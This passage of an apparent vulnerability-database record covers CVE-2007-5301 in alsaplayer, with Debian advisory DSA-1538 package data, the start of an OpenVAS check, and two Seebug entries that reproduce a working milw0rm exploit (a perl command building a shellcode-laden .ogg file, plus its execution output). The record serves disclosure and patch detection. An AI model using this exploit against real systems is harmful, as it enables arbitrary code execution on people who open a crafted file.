"Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-nas_0.99.76-9+etch1_powerpc.deb", "packageName": "alsaplayer-nas", "arch": "ppc", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-xosd_0.99.76-9+etch1_amd64.deb", "packageName": "alsaplayer-xosd", "arch": "x86-64", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "libalsaplayer-dev_0.99.76-9+etch1_i386.deb", "packageName": "libalsaplayer-dev", "arch": "i686", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-alsa_0.99.76-9+etch1_sparc.deb", "packageName": "alsaplayer-alsa", "arch": "sparc", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-common_0.99.76-9+etch1_s390.deb", "packageName": "alsaplayer-common", "arch": "s390x", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-xosd_0.99.76-9+etch1_mipsel.deb", "packageName": "alsaplayer-xosd", "arch": "mipsel", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-common_0.99.76-9+etch1_i386.deb", "packageName": "alsaplayer-common", "arch": "i686", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-nas_0.99.76-9+etch1_hppa.deb", "packageName": "alsaplayer-nas", "arch": "hppa", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "libalsaplayer0_0.99.76-9+etch1_arm.deb", "packageName": "libalsaplayer0", "arch": "arm", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-xosd_0.99.76-9+etch1_i386.deb", "packageName": "alsaplayer-xosd", "arch": "i686", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-gtk_0.99.76-9+etch1_alpha.deb", "packageName": "alsaplayer-gtk", "arch": "alpha", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-esd_0.99.76-9+etch1_amd64.deb", "packageName": "alsaplayer-esd", "arch": "x86-64", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer_0.99.76-9+etch1.dsc", "packageName": "alsaplayer", "arch": "src", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-jack_0.99.76-9+etch1_i386.deb", "packageName": "alsaplayer-jack", "arch": "i686", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-jack_0.99.76-9+etch1_s390.deb", "packageName": "alsaplayer-jack", "arch": "s390x", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-daemon_0.99.76-9+etch1_alpha.deb", "packageName": "alsaplayer-daemon", "arch": "alpha", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-xosd_0.99.76-9+etch1_sparc.deb", "packageName": "alsaplayer-xosd", "arch": "sparc", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-nas_0.99.76-9+etch1_i386.deb", "packageName": "alsaplayer-nas", "arch": "i686", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-xosd_0.99.76-9+etch1_ia64.deb", "packageName": "alsaplayer-xosd", "arch": "ia64", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "libalsaplayer-dev_0.99.76-9+etch1_ia64.deb", "packageName": "libalsaplayer-dev", "arch": "ia64", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "libalsaplayer0_0.99.76-9+etch1_hppa.deb", "packageName": "libalsaplayer0", "arch": "hppa", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "libalsaplayer0_0.99.76-9+etch1_sparc.deb", "packageName": "libalsaplayer0", "arch": "sparc", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-esd_0.99.76-9+etch1_ia64.deb", "packageName": "alsaplayer-esd", "arch": "ia64", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-oss_0.99.76-9+etch1_powerpc.deb", "packageName": "alsaplayer-oss", "arch": "ppc", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-nas_0.99.76-9+etch1_mips.deb", "packageName": "alsaplayer-nas", "arch": "mips", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-daemon_0.99.76-9+etch1_hppa.deb", "packageName": "alsaplayer-daemon", "arch": "hppa", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-gtk_0.99.76-9+etch1_amd64.deb", "packageName": "alsaplayer-gtk", "arch": "x86-64", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-alsa_0.99.76-9+etch1_arm.deb", "packageName": "alsaplayer-alsa", "arch": "arm", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-common_0.99.76-9+etch1_ia64.deb", "packageName": "alsaplayer-common", "arch": "ia64", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-nas_0.99.76-9+etch1_arm.deb", "packageName": "alsaplayer-nas", "arch": "arm", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-xosd_0.99.76-9+etch1_s390.deb", "packageName": "alsaplayer-xosd", "arch": "s390x", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-oss_0.99.76-9+etch1_mipsel.deb", "packageName": "alsaplayer-oss", "arch": "mipsel", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-text_0.99.76-9+etch1_s390.deb", "packageName": "alsaplayer-text", "arch": "s390x", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-jack_0.99.76-9+etch1_mips.deb", "packageName": "alsaplayer-jack", "arch": "mips", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-alsa_0.99.76-9+etch1_amd64.deb", "packageName": "alsaplayer-alsa", "arch": "x86-64", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-alsa_0.99.76-9+etch1_mips.deb", "packageName": "alsaplayer-alsa", "arch": "mips", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-jack_0.99.76-9+etch1_mipsel.deb", "packageName": "alsaplayer-jack", "arch": "mipsel", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "libalsaplayer0_0.99.76-9+etch1_alpha.deb", "packageName": "libalsaplayer0", "arch": "alpha", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "libalsaplayer0_0.99.76-9+etch1_mips.deb", "packageName": "libalsaplayer0", "arch": "mips", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-text_0.99.76-9+etch1_mips.deb", "packageName": "alsaplayer-text", "arch": "mips", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-esd_0.99.76-9+etch1_s390.deb", "packageName": "alsaplayer-esd", "arch": "s390x", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-daemon_0.99.76-9+etch1_ia64.deb", "packageName": "alsaplayer-daemon", "arch": "ia64", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-gtk_0.99.76-9+etch1_powerpc.deb", "packageName": "alsaplayer-gtk", "arch": "ppc", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "libalsaplayer0_0.99.76-9+etch1_mipsel.deb", "packageName": "libalsaplayer0", "arch": "mipsel", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "libalsaplayer0_0.99.76-9+etch1_powerpc.deb", "packageName": "libalsaplayer0", "arch": "ppc", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-alsa_0.99.76-9+etch1_powerpc.deb", "packageName": "alsaplayer-alsa", "arch": "ppc", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-oss_0.99.76-9+etch1_sparc.deb", "packageName": "alsaplayer-oss", "arch": "sparc", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "libalsaplayer-dev_0.99.76-9+etch1_mipsel.deb", "packageName": "libalsaplayer-dev", "arch": "mipsel", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-esd_0.99.76-9+etch1_hppa.deb", "packageName": "alsaplayer-esd", "arch": "hppa", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-daemon_0.99.76-9+etch1_mips.deb", "packageName": "alsaplayer-daemon", "arch": "mips", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-common_0.99.76-9+etch1_amd64.deb", "packageName": "alsaplayer-common", "arch": "x86-64", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-esd_0.99.76-9+etch1_i386.deb", "packageName": "alsaplayer-esd", "arch": "i686", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-nas_0.99.76-9+etch1_mipsel.deb", "packageName": "alsaplayer-nas", "arch": "mipsel", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-oss_0.99.76-9+etch1_s390.deb", "packageName": "alsaplayer-oss", "arch": "s390x", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-oss_0.99.76-9+etch1_alpha.deb", "packageName": "alsaplayer-oss", "arch": "alpha", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-text_0.99.76-9+etch1_sparc.deb", "packageName": "alsaplayer-text", "arch": "sparc", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "libalsaplayer-dev_0.99.76-9+etch1_alpha.deb", "packageName": "libalsaplayer-dev", "arch": "alpha", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-common_0.99.76-9+etch1_hppa.deb", "packageName": "alsaplayer-common", "arch": "hppa", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "libalsaplayer-dev_0.99.76-9+etch1_mips.deb", "packageName": "libalsaplayer-dev", "arch": "mips", "operator": "lt"}], "edition": 1, "description": "Erik Sj\u00f6lund discovered a buffer overflow vulnerability in the Ogg Vorbis input plugin of the alsaplayer audio playback application. Successful exploitation of this vulnerability through the opening of a maliciously crafted Vorbis file could lead to the execution of arbitrary code.\n\nFor the stable distribution (etch), the problem has been fixed in version 0.99.76-9+etch1.\n\nFor the unstable distribution (sid), the problem was fixed in version 0.99.80~rc4-1.\n\nWe recommend that you upgrade your alsaplayer packages.", "reporter": "Debian", "published": "2008-04-04T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "title": "alsaplayer -- buffer overrun", "type": "debian", "bulletinFamily": "unix", "cvelist": ["CVE-2007-5301"], "modified": "2008-04-04T00:00:00", "href": "http://www.debian.org/security/dsa-1538", "id": "DSA-1538", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "seebug": [{"lastseen": "2017-11-19T13:53:01", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "references": [], "enchantments_done": [], "description": "No description provided by source.", "reporter": "Root", "published": "2014-07-01T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "title": "Alsaplayer < 0.99.80-rc3 - Vorbis Input Local Buffer Overflow Exploit", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-5301"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-65318", "id": "SSV:65318", "sourceData": "\n I have released this exploit for the alsaplayer bug CVE-2007-5301.\r\n\r\nYou can find all the needed files at http://www.wekk.net/research/CVE-2007-5301/\r\n\r\nWith my modified version of vorbiscomment, you can generate a ogg exploit like this:\r\n\r\nwhats@debian:~$ vorbiscomment.whats -w -t "TITLE=$(perl -e 'print "AAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBXXXXX\\x77\\xe7\r\n\\xff\\xff\\x08\\x08\\x08\\x08\\x29\\xc9\\x83\\xe9\\xf4\\xe8\\xff\\xff\\xff\\xff\\xc0\\x5e\\x81\\x76\\x0e\r\n\\x46\\x90\\xbe\\x13\\x83\\xee\\xfc\\xe2\\xf4\\x2c\\x9b\\xe6\\x8a\\x14\\xf6\\xd6\\x3e\\x25\\x19\\x59\\x7b\r\n\\x69\\xe3\\xd6\\x13\\x2e\\xbf\\xdc\\x7a\\x28\\x19\\x5d\\x41\\xae\\x9c\\xbe\\x13\\x46\\xbf\\xcb\\x60\\x34\r\n\\xbf\\xdc\\x7a\\x28\\xbf\\xd7\\x77\\x46\\xc7\\xed\\x9a\\xa7\\x5d\\x3e\\x13"')" /usr/share/games/pydance/sound/back.ogg exploit.ogg \r\n\r\nThen, if you plays the file with the vulnerable version:\r\n\r\nwhats@debian:~$ alsaplayer exploit.ogg\r\nuid=1000(whats) gid=1000(whats) groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(whats)\r\n\r\nThis was tested with the debian etch packages.\r\n\r\n- whats\r\n\r\n# milw0rm.com [2008-04-10]\r\n\n ", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-65318", "status": "cve,poc"}, {"lastseen": "2017-11-19T21:49:04", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "enchantments_done": [], "references": [], "description": "No description provided by source.", "reporter": "Root", "published": "2008-04-11T00:00:00", "title": "Alsaplayer < 0.99.80-rc3 Vorbis Input Local Buffer Overflow Exploit", "type": "seebug", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2007-5301"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2008-04-11T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-8307", "id": "SSV:8307", "sourceData": "\n I have released this exploit for the alsaplayer bug CVE-2007-5301.\r\n\r\nYou can find all the needed files at http://www.wekk.net/research/CVE-2007-5301/\r\n\r\nWith my modified version of vorbiscomment, you can generate a ogg exploit like this:\r\n\r\nwhats@debian:~$ vorbiscomment.whats -w -t "TITLE=$(perl -e 'print "AAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBXXXXX\\x77\\xe7\r\n\\xff\\xff\\x08\\x08\\x08\\x08\\x29\\xc9\\x83\\xe9\\xf4\\xe8\\xff\\xff\\xff\\xff\\xc0\\x5e\\x81\\x76\\x0e\r\n\\x46\\x90\\xbe\\x13\\x83\\xee\\xfc\\xe2\\xf4\\x2c\\x9b\\xe6\\x8a\\x14\\xf6\\xd6\\x3e\\x25\\x19\\x59\\x7b\r\n\\x69\\xe3\\xd6\\x13\\x2e\\xbf\\xdc\\x7a\\x28\\x19\\x5d\\x41\\xae\\x9c\\xbe\\x13\\x46\\xbf\\xcb\\x60\\x34\r\n\\xbf\\xdc\\x7a\\x28\\xbf\\xd7\\x77\\x46\\xc7\\xed\\x9a\\xa7\\x5d\\x3e\\x13"')" /usr/share/games/pydance/sound/back.ogg exploit.ogg \r\n\r\nThen, if you plays the file with the vulnerable version:\r\n\r\nwhats@debian:~$ alsaplayer exploit.ogg\r\nuid=1000(whats) gid=1000(whats) groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(whats)\r\n\r\nThis was tested with the debian etch packages.\r\n\r\n- whats\n ", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-8307", "status": "poc"}], "openvas": [{"lastseen": "2017-07-24T12:50:07", "references": [], "pluginID": "60785", "description": "The remote host is missing an update to alsaplayer\nannounced via advisory DSA 1538-1.", "edition": 2, "reporter": "Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com", "published": "2008-04-21T00:00:00", "title": "Debian Security Advisory DSA 1538-1 (alsaplayer)", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-5301"], "modified": "2017-07-07T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=60785", "id": "OPENVAS:60785", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1538_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 1538-1 (alsaplayer)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Erik Sj\u00f6lund discovered a buffer overflow vulnerability in the Ogg\nVorbis input plugin of the alsaplayer audio playback application.\nSuccessful exploitation of this vulnerability through the opening of a\nmaliciously-crafted Vorbis file could lead to the execution of\narbitrary code.\n\nFor the stable distribution (etch), the problem has been fixed in\nversion 0.99.76-9+etch1.\n\nFor the unstable distribution (sid), the problem was fixed in version\n0.99.80~rc4-1.\n\nWe recommend that you upgrade your alsaplayer packages.\";\ntag_summary = \"The remote host is missing an update to alsaplayer\nannounced via advisory DSA 1538-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201538-1\";\n\n\nif(description)\n{\n script_id(60785);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-04-21 20:40:14 +0200 (Mon, 21 Apr 2008)\");\n script_cve_id(\"CVE-2007-5301\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_name(\"Debian Security Advisory DSA 1538-1 (alsaplayer)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif 